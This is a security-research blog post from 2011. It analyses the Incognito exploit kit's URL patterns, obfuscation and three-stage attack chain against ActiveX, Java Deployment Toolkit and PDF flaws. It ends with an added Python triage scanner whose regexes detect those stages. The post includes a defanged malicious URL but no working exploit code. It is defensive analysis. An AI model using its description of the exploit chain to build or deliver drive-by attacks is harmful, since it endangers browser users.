Zscaler Blog

Security Research

Incognito Exploit Kit

THREATLABZ
June 14, 2011 - 2 min read

Exploit kits are becoming an increasingly popular means of spreading attacks. Umesh recently blogged about seeing a spike in the usage of the Blackhole exploit kit. This exploit kit targets multiple known vulnerabilities present in a victim's browser, increasing the probability of a successful compromise. Various exploit kits differ in the way they are packaged, designed and implemented. The most distinguishing factor among different exploit kits is how exploits are obfuscated, in order to bypass various security controls.

Recently, I have noticed a significant increase in the usage of the Incognito exploit kit. Similar to the Blackhole exploit kit, Incognito also targets vulnerabilities in Java and Adobe products. Another item that distinguishes these exploit kits from one another is the URL patterns they use. Most of the time, the URL pattern remains the same within a given exploit kit. A quick look at malwaredomainlist shows the common patterns used in URLs associated with Incognito.

Common URL patterns for Incognito:

[Image: common URL patterns for Incognito]

Code obfuscation (formatted for readability):

[Image: obfuscated JavaScript, formatted for readability]

De-obfuscating the JavaScript shows the exploit kit carrying out several different attack vectors. Let's analyze the different pieces of the de-obfuscated code.

Object initializations and other functions:

[Image: object initializations and helper functions from the de-obfuscated code]

Iframe injection:

[Image: iframe injection code]

Google Safe Browsing reports this URL as malicious. Visiting the link redirects you to a fake search portal delivering ads: hxxp://searchportal.information.com/?o_id=164060&domainname=register-domain-names.info.

Step 0: This is the entry point of the malicious code. It completes the required initialization of objects for vulnerable ActiveX controls. Upon successful creation of the objects, it launches the first attack vector by calling the function 'gr', which injects a malicious file. The code then moves on to Step 1.

[Image: Step 0 code]

Vulnerability Details:
CVE : CVE-2006-4704
Name : Microsoft Visual Studio 2005 WMI Object Broker Remote Code Execution Vulnerability

My previous blog post describes a different version of obfuscated JavaScript targeting this vulnerability.

Step 1: This code targets the “Java Deployment Toolkit”.

[Image: Step 1 code]

Vulnerability Details:
CVE : CVE-2010-1423
Name : Java Deployment Toolkit insufficient argument validation


Step 2: This creates iframe tags for malicious PDFs.

[Image: Step 2 code]
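As an added example (not code from the original post or from the kit itself), here is a small Python triage script that scans de-obfuscated landing-page content for the three stages described above: vulnerable ActiveX object set-up (Step 0), a plugin launch() call of the Java Deployment Toolkit kind (Step 1), and hidden iframes pointing at PDFs (Step 2). The sample page, the ProgID and the CLSID in it are constructed placeholders, and the stage mapping is a heuristic for analyst triage, not a signature.

```python
import re

# Constructed sample landing page, modelled on the three stages the post
# describes. The ProgID and CLSID are placeholders, not real identifiers.
SAMPLE_HTML = """<script>
var ax = new ActiveXObject("Placeholder.VulnerableControl");
function gr() { ax.DoSomething(); }            // Step 0 payload call
var jdt = document.createElement("object");
jdt.classid = "clsid:00000000-0000-0000-0000-000000000000";
jdt.launch("http://example.invalid/app.jnlp"); // Step 1 plugin launch()
document.write('<iframe src="/p/one.pdf" width="1" height="1"></iframe>');
</script>
<iframe src="http://example.invalid/two.pdf" width=0 height=0 style="visibility:hidden"></iframe>"""

# Constructed benign page: an ordinary, visible iframe and no plugin objects.
BENIGN_HTML = '<p>hello</p><iframe src="https://example.invalid/map" width="600"></iframe>'

ACTIVEX_RE = re.compile(r'new\s+ActiveXObject\s*\(\s*["\']([^"\']+)["\']', re.I)
CLASSID_RE = re.compile(r'clsid:([0-9a-f-]{36})', re.I)
LAUNCH_RE = re.compile(r'\.\s*launch\s*\(', re.I)
IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
HIDDEN_RE = re.compile(r'\b(?:width|height)\s*=\s*["\']?[01]\b|visibility\s*:\s*hidden|display\s*:\s*none', re.I)

def scan_landing_page(html):
    """Collect indicators from de-obfuscated page content and map them to stages 0, 1, 2."""
    r = {"activex": ACTIVEX_RE.findall(html),
         "classids": [c.lower() for c in CLASSID_RE.findall(html)],
         "launch_calls": len(LAUNCH_RE.findall(html)),
         "pdf_iframes": [], "stages": []}
    for attrs in IFRAME_RE.findall(html):
        m = SRC_RE.search(attrs)
        if not m:
            continue
        src, hidden = m.group(1), bool(HIDDEN_RE.search(attrs))
        if src.lower().endswith(".pdf") or hidden:   # Step 2: hidden or PDF-bearing frame
            r["pdf_iframes"].append((src, hidden))
    if r["activex"]:                                  # Step 0: ActiveX objects created
        r["stages"].append(0)
    if r["launch_calls"] and (r["classids"] or r["activex"]):  # Step 1: plugin launch()
        r["stages"].append(1)
    if r["pdf_iframes"]:
        r["stages"].append(2)
    return r

def looks_like_exploit_kit(r):
    """Heuristic verdict: two or more of the stages chained on one page."""
    return len(r["stages"]) >= 2
```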

This example illustrates how the multi-stage attacks delivered by exploit kits are becoming a favored choice of attackers. More importantly, the creation of automated tools to deliver these exploits gives attackers the opportunity to launch campaigns frequently and with limited technical knowledge.

Pradeep
